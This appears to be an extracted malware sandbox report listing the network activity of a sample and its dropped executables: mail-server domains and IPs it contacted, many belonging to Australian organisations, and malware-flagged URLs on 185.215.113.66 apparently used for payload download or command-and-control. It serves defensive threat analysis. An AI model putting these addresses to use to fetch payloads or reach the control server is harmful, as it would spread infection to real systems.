                                                                      13.238.202.140
                                                                      truefalse
                                                                        high
                                                                        smtpin2.three.com.au
                                                                        202.124.68.52
                                                                        truefalse
                                                                          unknown
                                                                          mx3.email-hosting.net.au
                                                                          103.252.153.16
                                                                          truefalse
                                                                            unknown
                                                                            hum-au-dk.mail.protection.outlook.com
                                                                            104.47.0.36
                                                                            truefalse
                                                                              high
                                                                              pacbrands-com-au.mail.protection.outlook.com
                                                                              104.47.71.202
                                                                              truefalse
                                                                                high
                                                                                hosted-inbound.iinet.net.au
                                                                                203.10.1.146
                                                                                truefalse
                                                                                  unknown
                                                                                  mail.calmon.com.au
                                                                                  117.120.13.136
                                                                                  truefalse
                                                                                    unknown
                                                                                    eu-smtp-inbound-1.mimecast.com
                                                                                    91.220.42.241
                                                                                    truefalse
                                                                                      high
                                                                                      fortimail02.wide.net.au
                                                                                      121.200.0.59
                                                                                      truefalse
                                                                                        unknown
                                                                                        emmconsult.com.au
                                                                                        203.210.102.35
                                                                                        truefalse
                                                                                          unknown
                                                                                          mx2.nameserver.net.au
                                                                                          103.42.110.229
                                                                                          truefalse
                                                                                            unknown
                                                                                            deakin-edu-au.mail.protection.outlook.com
                                                                                            104.47.71.202
                                                                                            truefalse
                                                                                              high
                                                                                              docparmail01.fairtrading.nsw.gov.au
                                                                                              61.88.105.36
                                                                                              truefalse
                                                                                                unknown
                                                                                                soniccomputing-com-au.mail.protection.outlook.com
                                                                                                104.47.71.138
                                                                                                truefalse
                                                                                                  high
                                                                                                  mx.spamexperts.com
                                                                                                  130.117.53.188
                                                                                                  truefalse
                                                                                                    high
                                                                                                    cdu-edu-au.mail.protection.outlook.com
                                                                                                    104.47.71.202
                                                                                                    truefalse
                                                                                                      high
                                                                                                      carey-com-au.mail.protection.outlook.com
                                                                                                      104.47.71.202
                                                                                                      truefalse
                                                                                                        high
                                                                                                        anu-edu-au.mail.protection.outlook.com
                                                                                                        104.47.71.202
                                                                                                        truefalse
                                                                                                          high
                                                                                                          corptech-qld-gov-au.mail.protection.outlook.com
                                                                                                          104.47.71.138
                                                                                                          truefalse
                                                                                                            high
                                                                                                            amerro-com-au.mail.protection.outlook.com
                                                                                                            104.47.71.202
                                                                                                            truefalse
                                                                                                              high
                                                                                                              bwcl-com-au.mail.protection.outlook.com
                                                                                                              104.47.71.202
                                                                                                              truefalse
                                                                                                                high
                                                                                                                mx1.spintel.net.au
                                                                                                                203.29.125.68
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  chubb-com-au.mail.protection.outlook.com
                                                                                                                  104.47.20.36
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    smtp6.health.qld.gov.au
                                                                                                                    165.86.71.114
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      asav2.iinet.net.au
                                                                                                                      27.32.32.49
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        mail.dcsi.net.au
                                                                                                                        203.30.68.68
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          au-smtp-inbound-1.mimecast.com
                                                                                                                          103.13.69.122
                                                                                                                          truefalse
                                                                                                                            high
                                                                                                                            imcc-wa-edu-au.mail.protection.outlook.com
                                                                                                                            104.47.71.202
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              legalaid-tas-gov-au.mail.protection.outlook.com
                                                                                                                              104.47.71.202
                                                                                                                              truefalse
                                                                                                                                high
                                                                                                                                ipt-mailgate-01.m2core.com.au
                                                                                                                                203.134.71.81
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  mx2.fusemail.net
                                                                                                                                  72.35.12.4
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    sydneywater-com-au.mail.protection.outlook.com
                                                                                                                                    104.47.71.138
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      extmail.optusnet.com.au
                                                                                                                                      211.29.133.14
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        mx3.spintel.net.au
                                                                                                                                        203.29.125.6
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          cgs-act-edu-au.mail.protection.outlook.com
                                                                                                                                          104.47.71.202
                                                                                                                                          truefalse
                                                                                                                                            high
                                                                                                                                            slmcorporate-com-au.p10.spamhero.com
                                                                                                                                            209.41.68.146
                                                                                                                                            truefalse
                                                                                                                                              high
                                                                                                                                              mx2.hc676-53.ap.iphmx.com
                                                                                                                                              23.90.107.55
                                                                                                                                              truefalse
                                                                                                                                                high
                                                                                                                                                mxs.mail.ru
                                                                                                                                                217.69.139.150
                                                                                                                                                truefalse
                                                                                                                                                  high
                                                                                                                                                  act-mx.csiro.au
                                                                                                                                                  150.229.7.40
                                                                                                                                                  truefalse
                                                                                                                                                    high
                                                                                                                                                    mta5.am0.yahoodns.net
                                                                                                                                                    98.136.96.75
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      mx.netregistry.net
                                                                                                                                                      202.124.241.196
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        alt4.aspmx.l.google.com
                                                                                                                                                        173.194.202.27
                                                                                                                                                        truefalse
                                                                                                                                                          high
                                                                                                                                                          cust7610-2.in.mailcontrol.com
                                                                                                                                                          116.50.58.190
                                                                                                                                                          truefalse
                                                                                                                                                            high
                                                                                                                                                            creativeelements-com-au.mail.protection.outlook.com
                                                                                                                                                            104.47.71.202
                                                                                                                                                            truefalse
                                                                                                                                                              high
                                                                                                                                                              asav.tpgtelecom.com.au
                                                                                                                                                              27.32.28.130
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                ci-austin-tx-us.mail.protection.outlook.com
                                                                                                                                                                104.47.64.110
                                                                                                                                                                truefalse
                                                                                                                                                                  high
                                                                                                                                                                  mta7.am0.yahoodns.net
                                                                                                                                                                  98.136.96.76
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    tang.in.tmes-anz.trendmicro.com
                                                                                                                                                                    13.238.202.140
                                                                                                                                                                    truefalse
                                                                                                                                                                      high
                                                                                                                                                                      mlcsyd-nsw-edu-au.mail.protection.outlook.com
                                                                                                                                                                      104.47.71.202
                                                                                                                                                                      truefalse
                                                                                                                                                                        high
                                                                                                                                                                        asav.iinet.net.au
                                                                                                                                                                        203.59.218.120
                                                                                                                                                                        truefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          mx1.nameserver.net.au
                                                                                                                                                                          112.140.176.121
                                                                                                                                                                          truefalse
                                                                                                                                                                            unknown
                                                                                                                                                                            us-smtp-inbound-1.mimecast.com
                                                                                                                                                                            205.139.110.242
                                                                                                                                                                            truefalse
                                                                                                                                                                              high
                                                                                                                                                                              cluster9a.us.messagelabs.com
                                                                                                                                                                              52.207.128.88
                                                                                                                                                                              truefalse
                                                                                                                                                                                high
                                                                                                                                                                                mail.austarnet.com.au
                                                                                                                                                                                143.95.39.218
                                                                                                                                                                                truefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  donnahay-com-au.mail.protection.outlook.com
                                                                                                                                                                                  104.47.71.138
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    aspmx4.googlemail.com
                                                                                                                                                                                    142.251.8.26
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      findtime.com.au
                                                                                                                                                                                      221.121.138.114
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        webcentral-com-au.mail.protection.outlook.com
                                                                                                                                                                                        104.47.71.202
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          high
                                                                                                                                                                                          lastmx.spamexperts.net
                                                                                                                                                                                          149.13.75.27
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            ASPMX.L.google.com
                                                                                                                                                                                            142.251.31.26
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              high
                                                                                                                                                                                              rfi-com-au.mail.protection.outlook.com
                                                                                                                                                                                              104.47.71.202
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                alt1.aspmx.l.google.com
                                                                                                                                                                                                142.250.150.26
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  act-gov-au.mail.protection.outlook.com
                                                                                                                                                                                                  104.47.71.202
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    mx-2.planetozi.com.au
                                                                                                                                                                                                    202.22.162.67
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      mx1.free.fr
                                                                                                                                                                                                      212.27.48.7
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        cluster8a.us.messagelabs.com
                                                                                                                                                                                                        52.207.128.88
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          asav.tpg.com.au
                                                                                                                                                                                                          27.32.32.10
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            alt3.aspmx.l.google.com
                                                                                                                                                                                                            142.251.8.26
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              dibp-ibmail2.msng.telstra.com.au
                                                                                                                                                                                                              58.162.22.25
                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                mail.idx.com.au
                                                                                                                                                                                                                45.56.220.103
                                                                                                                                                                                                                truefalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  mx07-00031601.pphosted.com
                                                                                                                                                                                                                  91.207.212.222
                                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    mx.syd.iprimus.com.au
                                                                                                                                                                                                                    203.134.71.81
                                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      mail.bidbuild.com.au
                                                                                                                                                                                                                      69.90.161.80
                                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        icarehealth-com.mail.protection.outlook.com
                                                                                                                                                                                                                        104.47.71.138
                                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          ALT1.ASPMX.L.GOOGLE.COM
                                                                                                                                                                                                                          142.250.150.27
                                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            fahan-tas-edu-au.mail.protection.outlook.com
                                                                                                                                                                                                                            104.47.71.202
                                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                              http://185.215.113.66/pol/n.txttrue
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://185.215.113.66/5true
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://185.215.113.66/pol/608.txttrue
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://185.215.113.66/4true
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://185.215.113.66/3true
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://185.215.113.66/2false
                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://icanhazip.com/false
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://185.215.113.66/1false
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://185.215.113.66/getntbupfalse
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                http://185.215.113.66/1wsysfevcs.exe, 00000001.00000003.294174080.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292642179.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.296875784.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292536560.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.294393679.0000000002FCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://185.215.113.66/4asysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://185.215.113.66/5-586C90B09FEFsysfevcs.exe, 00000001.00000003.297277850.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342282452.0000000002FED000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://schemas.xmlsoap.org/soap/encoding/sysfevcs.exe.0.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://185.215.113.66/1Csysfevcs.exe, 00000001.00000003.294174080.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292642179.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.296875784.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292536560.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.294393679.0000000002FCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/sysfevcs.exe.0.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://185.215.113.66/1jsysfevcs.exe, 00000001.00000003.296875784.0000000002FCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://185.215.113.66/3jsysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://185.215.113.66/2Nsysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://185.215.113.66/1ksysfevcs.exe, 00000001.00000003.292642179.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292536560.0000000002FCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://icanhazip.com/.2350331867.exe, 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmp, 2350331867.exe, 0000000C.00000000.320868021.0000000000903000.00000002.00000001.01000000.00000008.sdmp, 2350331867.exe.1.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://185.215.113.66/4Xsysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://185.215.113.66/2Wsysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://185.215.113.66/pol/http://185.215.113.66/pol/n.txt2350331867.exe, 0000000C.00000002.520226091.00000000033D9000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://185.215.113.66/1Zsysfevcs.exe, 00000001.00000003.296381249.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.297008756.0000000003006000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.293763030.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.293828490.0000000003006000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.293672607.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485423655.0000000003004000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.295825714.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://185.215.113.66/getntbupusysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://185.215.113.66/1Wsysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/getntbup:sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/ED-4BF2-83AB-37B7B86E58B0sysfevcs.exe, 00000001.00000003.297277850.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342282452.0000000002FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/3asysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/getntbuprsysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/5jsysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/sysfevcs.exe, sysfevcs.exe, 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmp, 2676917645.exe, 0000000F.00000000.482223797.0000000000412000.00000008.00000001.01000000.00000009.sdmp, sysfevcs.exe, 00000010.00000000.505264541.0000000000412000.00000008.00000001.01000000.0000000A.sdmp, l3Qj8QhTYZ.exe, 2676917645.exe.1.dr, sysfevcs.exe.15.dr, sysfevcs.exe.0.drfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/2Esysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/4Posysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://ica.215.113.66/1sysfevcs.exe, 00000001.00000003.341785730.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        low
                                                                                                                                                                                                                                        http://185.215.113.66/4LMEM0sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/1Nsysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/4ystem32sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/4/sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/pol/2350331867.exe, 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmp, 2350331867.exe, 0000000C.00000002.518421065.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp, 2350331867.exe, 0000000C.00000002.520226091.00000000033D9000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/5858874sysfevcs.exeWindowsl3Qj8QhTYZ.exe, 2676917645.exe.1.dr, sysfevcs.exe.15.dr, sysfevcs.exe.0.drtrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/3ystem32sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/43sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/4ssysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/2tsysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://185.215.113.66/47sysfevcs.exe, 00000001.00000002.485142769.000000000260A000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        143.95.39.218
                                                                                                                                                                                                                                        mail.austarnet.com.auUnited States
                                                                                                                                                                                                                                        62729ASMALLORANGE1USfalse
                                                                                                                                                                                                                                        213.230.109.3
                                                                                                                                                                                                                                        unknownUzbekistan
                                                                                                                                                                                                                                        8193BRM-ASUZfalse
                                                                                                                                                                                                                                        185.194.125.197
                                                                                                                                                                                                                                        unknownSyrian Arab Republic
                                                                                                                                                                                                                                        29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                                                                                                                                                                                        23.90.107.55
                                                                                                                                                                                                                                        mx2.hc676-53.ap.iphmx.comUnited States
                                                                                                                                                                                                                                        16417IRONPORT-SYSTEMS-INCUSfalse
                                                                                                                                                                                                                                        142.251.8.26
                                                                                                                                                                                                                                        aspmx4.googlemail.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        205.139.110.242
                                                                                                                                                                                                                                        us-smtp-inbound-1.mimecast.comUnited States
                                                                                                                                                                                                                                        30031MIMECAST-USfalse
                                                                                                                                                                                                                                        104.47.71.138
                                                                                                                                                                                                                                        tempofoods-com-au.mail.protection.outlook.comUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        203.134.71.81
                                                                                                                                                                                                                                        mx1.eftel.comAustralia
                                                                                                                                                                                                                                        9443VOCUS-RETAIL-AUVocusRetailAUfalse
                                                                                                                                                                                                                                        124.47.150.26
                                                                                                                                                                                                                                        au-smtp-inbound-2.mimecast.comAustralia
                                                                                                                                                                                                                                        17477MCT-SYDNEYMacquarieTelecomAUfalse
                                                                                                                                                                                                                                        142.251.8.27
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        185.132.180.25
                                                                                                                                                                                                                                        mxb-00299f02.gslb.pphosted.comNetherlands
                                                                                                                                                                                                                                        52129PROOFPOINT-ASN-EUGBfalse
                                                                                                                                                                                                                                        217.69.139.150
                                                                                                                                                                                                                                        mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                        47764MAILRU-ASMailRuRUfalse
                                                                                                                                                                                                                                        104.18.114.97
                                                                                                                                                                                                                                        icanhazip.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        142.251.31.26
                                                                                                                                                                                                                                        ASPMX.L.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        209.222.82.255
                                                                                                                                                                                                                                        d173919b.ess.barracudanetworks.comUnited States
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        3.104.195.181
                                                                                                                                                                                                                                        filter2.microm-1.mailguard.com.auUnited States
                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                        117.120.13.136
                                                                                                                                                                                                                                        mail.calmon.com.auAustralia
                                                                                                                                                                                                                                        7595READYSPACE-SGReadyspaceCloudServicesSGfalse
                                                                                                                                                                                                                                        142.250.150.26
                                                                                                                                                                                                                                        alt1.aspmx.l.google.comUnited States
